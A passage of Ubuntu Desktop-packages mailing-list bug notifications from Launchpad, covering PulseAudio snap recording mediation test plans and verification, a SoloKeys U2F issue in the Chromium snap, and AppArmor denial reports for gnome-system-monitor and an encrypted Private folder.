Realtek Semiconductor Corp. USB2.0 HD UVC WebCam Bus 001 Device 002: ID 046d:c52b Logitech, Inc. Unifying Receiver Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: ASUSTeK COMPUTER INC. UX330UAK Package: chromium-browser 77.0.3865.120-0ubuntu1.19.10.1 PackageArchi
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Installing 1:8.0-0ubuntu3.11 from xenial-proposed, the test plan and James' addition for mediation is preserved across snapd restart all works as expected. Marking as verification done. ** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes + + $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install test-snapd-audio-record --edge $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $ test-snapd-audio-record.play
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Installing 1:11.1-1ubuntu7.5 from bionic-proposed, the test plan and James' addition for mediation is preserved across snapd restart all works as expected. Marking as verification done. ** Tags removed: verification-needed-bionic ** Tags added: verification-done-bionic -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: Fix Committed Status in pulseaudio source package in Bionic: Fix Committed Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install test-snapd-audio-record --edge $ snap connections test-snapd-audio-record # record not connected Interface Plug
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: - $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap + $ sudo snap install test-snapd-pulseaudio --edge $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 - $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap + $ sudo snap install test-snapd-audio-record --edge $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes xcb_connection
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
** Changed in: snapd (Ubuntu) Status: Triaged => In Progress -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1851211 Title: [snap] SoloKeys not supported by u2f-devices interface Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: In Progress Bug description: This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium- browser/+bug/1738164 it is still open. No chance to use such a key in the browser. dmesg output is: My dmesg out put shows a lot of DENIED: audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?' [ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7036.430641] audit: type=1400 audit(1572541713.042:245): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7049.256201] audit: type=1400 audit(1572541725.870:246): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/sys/devices/pci:00/:00:15.1/i2c_designware.1/i2c-2/i2c-ELAN1200:00/0018:04F3:3022.0001/report_descriptor" pid=20568 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 Suggested solutions in the other tickets do not work System is Ubuntu 19.10 on an Asus UX330 --- ProblemType: Bug ApportVersion: 2.20.11-0ubuntu8.2 Architecture: amd64 CurrentDesktop: ubuntu:GNOME DRM.card0-HDMI-A-1: enabled: enabled dpms: On status: connected edid-base64: AP///wAebcxW838CAAYUAQOANR54Cq7FoldKnCUSUFQhCACzAIGAgUABAQEBAQEBAQEBGjaAoHA4H0AwIDUAEyshAAAaAjqAGHE4LUBYLEUAEyshAAAe/QA4PR5TDwAKICAgICAg/ABXMjQ0MgogICAgICAgATICAyHxTpAEAwEUEgUfEBMAIwkHB4MBAABlAwwAEAACOoAYcTgtQFgsRQATKyEAAB4BHYAYcRwWIFgsJQATKyEAAJ4BHQByUdAeIG4oVQATKyEAAB6MCtCKIOAtEBA+lgATKyEAABgAJg== modes: 1920x1080 1920x1080 1920x1080 1920x1080 1920x1080i 1920x1080i 1920x1080i 1920x1080 1920x1080i 1680x1050 1280x1024 1280x960 1280x720 1280x720 1280x720 1280x720 1024x768 800x600 720x576 720x480 720x480 720x480 720x480 640x480 640x480 640x480 DRM.card0-eDP-1: enabled: disabled dpms: Off status: connected edid-base64: AP///wAGry0nABAZAQSVHRF4ArwFolVMmiUOUFQBAQEBAQEBAQEBAQEBAQEBFDeAuHA4JEAQED4AJaUQAAAY/gBBVU8KICAgICAgICAg/gBCMTMzSEFOMDIuNyAKAII= modes: 1920x1080 DiskUsage: Filesystem Type Size Used Avail Use% Mounted on /dev/sda6 ext4 184G 35G 140G 20% /home tmpfs tmpfs 7,8G 152M 7,7G 2% /dev/shm /dev/sda6 ext4 184G 35G 140G 20% /home DistroRelease: Ubuntu 19.10 InstallationDate: Installed on 2017-09-30 (766 days ago) InstallationMedia: Ubuntu 17.04 "Zesty Zapus" - Release amd64 (20170412) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 8087:0a2b Intel Corp. Bus 001 Device 003: ID 0bda:58d1 Realtek Semiconductor Corp. USB2.0 HD UVC WebCam Bus 001 Device 002: ID 046d:c52b Logitech, Inc. Unifying Receiver Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: ASUSTeK COMPUTER INC. UX330UAK Package: chromium-browser 77.0.3865.120-0ubuntu1.19.10.1 PackageArchitecture: amd64 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=33f0c319-6f77-49d2-85ed-236d397fc004 ro quiet splash vt.handoff=7 ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1 Snap.ChromeDriverVersion: ChromeDriver 78.0.3904.70 (edb9c9f3de0247fd912a77b7f6cae7447f6d3ad5-refs/branch-heads/3904@{#800}) Snap.ChromiumVersion: Chromium 78.0.3904.70 snap Tags: eoan snap Uname: Linux 5.3.0-19-generic x86_64 UpgradeStatus: Upgraded to eoan on 2019-10-23 (14 days ago) UserGroups: adm cdrom daemon dialout dip docker kvm lpadmin plugdev sambashare sudo www-data _MarkForUpload: True dmi.bios.date: 04/19/2019 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: UX330UAK.315 dmi.board.asset.tag: ATN12345678901234567 dmi.board.
[Desktop-packages] [Bug 1778332] Re: Apparmor Permission Denied (apparmor="DENIED")
Clement, your issue is different than Charles'. More information is required from you to triage your issue. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu. https://bugs.launchpad.net/bugs/1778332 Title: Apparmor Permission Denied (apparmor="DENIED") Status in gnome-system-monitor package in Ubuntu: Expired Bug description: I try to launch the system monitor but nothing show up. journalctl -f Result: Jun 23 19:04:24 laptop-hostname audit[8109]: AVC apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid" Jun 23 19:04:24 laptop-hostname kernel: audit: type=1400 audit(1529751864.744:47): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid" Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: snap-update-ns failed with code 1: File exists Jun 23 19:04:28 laptop-hostname pkexec[8128]: pam_unix(polkit-1:session): session opened for user root by (uid=1000) /var/log/syslog Result: Jun 23 19:03:17 laptop-hostname kernel: [ 433.266715] audit: type=1400 audit(1529751797.796:42): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/snap/gnome-system-monitor/45/gnome-platform/" pid=7471 comm="3" srcname="/snap/gnome-3-26-1604/64/" flags="rw, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.799121 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/snap/gnome-3-26-1604/64 /snap/gnome-system-monitor/45/gnome-platform none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.833637 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/local/share/fonts /usr/local/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.301209] audit: type=1400 audit(1529751797.828:43): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/local/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.835300 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/share/fonts /usr/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.838094 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/var/cache/fontconfig /var/cache/fontconfig none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.302850] audit: type=1400 audit(1529751797.832:44): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.305652] audit: type=1400 audit(1529751797.832:45): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/var/cache/fontconfig/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.336540] audit: type=1400 audit(1529751797.864:46): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=7478 comm="3" capability=6 capname="setgid" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: snap-update-ns failed with code 1 Jun 23 19:03:18 laptop-hostname PackageKit: resolve transaction /260_bebcecdc from uid 1000 finished with success after 610ms To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-system-monitor/+bug/1778332/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1778332] Re: Apparmor Permission Denied (apparmor="DENIED")
Nov 11 09:47:56 kernel: audit: type=1400 audit(1573487276.018:797080): apparmor="DENIED" operation="open" profile="snap.gnome-system-monitor.gnome-system-monitor" name="/run/systemd/sessions/c1" pi d=8733 comm="gnome-system-mo" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 I'm able to reproduce this on 19.10 under X11 (but not Wayland) in the default install. I'll update snap for this denial. That fix should be in snapd 2.43. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu. https://bugs.launchpad.net/bugs/1778332 Title: Apparmor Permission Denied (apparmor="DENIED") Status in gnome-system-monitor package in Ubuntu: Expired Bug description: I try to launch the system monitor but nothing show up. journalctl -f Result: Jun 23 19:04:24 laptop-hostname audit[8109]: AVC apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid" Jun 23 19:04:24 laptop-hostname kernel: audit: type=1400 audit(1529751864.744:47): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid" Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: snap-update-ns failed with code 1: File exists Jun 23 19:04:28 laptop-hostname pkexec[8128]: pam_unix(polkit-1:session): session opened for user root by (uid=1000) /var/log/syslog Result: Jun 23 19:03:17 laptop-hostname kernel: [ 433.266715] audit: type=1400 audit(1529751797.796:42): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/snap/gnome-system-monitor/45/gnome-platform/" pid=7471 comm="3" srcname="/snap/gnome-3-26-1604/64/" flags="rw, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.799121 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/snap/gnome-3-26-1604/64 /snap/gnome-system-monitor/45/gnome-platform none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.833637 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/local/share/fonts /usr/local/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.301209] audit: type=1400 audit(1529751797.828:43): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/local/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.835300 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/share/fonts /usr/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.838094 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/var/cache/fontconfig /var/cache/fontconfig none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.302850] audit: type=1400 audit(1529751797.832:44): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.305652] audit: type=1400 audit(1529751797.832:45): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/var/cache/fontconfig/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.336540] audit: type=1400 audit(1529751797.864:46): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=7478 comm="3" capability=6 capname="setgid" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: snap-update-ns failed with code 1 Jun 23 19:03:18 laptop-hostname PackageKit: resolve transaction /260_bebcecdc from uid 1000 finished with success after 610ms To manage notifications about this bug go to: https://bugs.launchpad.n
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: snapd (Ubuntu) Status: Triaged => In Progress ** Also affects: apparmor Importance: Undecided Status: New ** Changed in: apparmor Status: New => Triaged ** Changed in: apparmor Importance: Undecided => Low ** Changed in: apparmor Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in AppArmor: Triaged Status in chromium-browser package in Ubuntu: Invalid Status in snapd package in Ubuntu: In Progress Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1791454] Re: system-monitor produces many apparmor permission denied warnings
Note, these accesses were added in 22d37f834b6f4605faa3887bae3cf4d0e1673278 ** Changed in: gnome-system-monitor (Ubuntu) Status: Confirmed => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu. https://bugs.launchpad.net/bugs/1791454 Title: system-monitor produces many apparmor permission denied warnings Status in gnome-system-monitor package in Ubuntu: Fix Released Bug description: gnome-system-monitor (installed as snap, latest stable version) on Ubuntu 18.04.1 causes while running many warnings in the system log of the following type: audit[2095]: AVC apparmor="DENIED" operation="open" profile="snap .gnome-system-monitor.gnome-system-monitor" name="/proc/2932/wchan" pid=2095 comm="gnome-system-mo" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 audit[2095]: AVC apparmor="DENIED" operation="open" profile="snap .gnome-system-monitor.gnome-system-monitor" name="/proc/1/cgroup" pid=2095 comm="gnome-system-mo" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 The output of journalctl | grep "operation=\"open\" profile=\"snap.gnome-system-monitor.gnome" | wc -l amounts on my system to 4 924 215 . For comparison journalctl | wc -l amounts to 5 143 715 . Thus it is really spamming my system log. output of snap info gnome-system-monitor is attached. output of lsb_release -rd: Description:Ubuntu 18.04.1 LTS Release:18.04 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-system-monitor/+bug/1791454/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
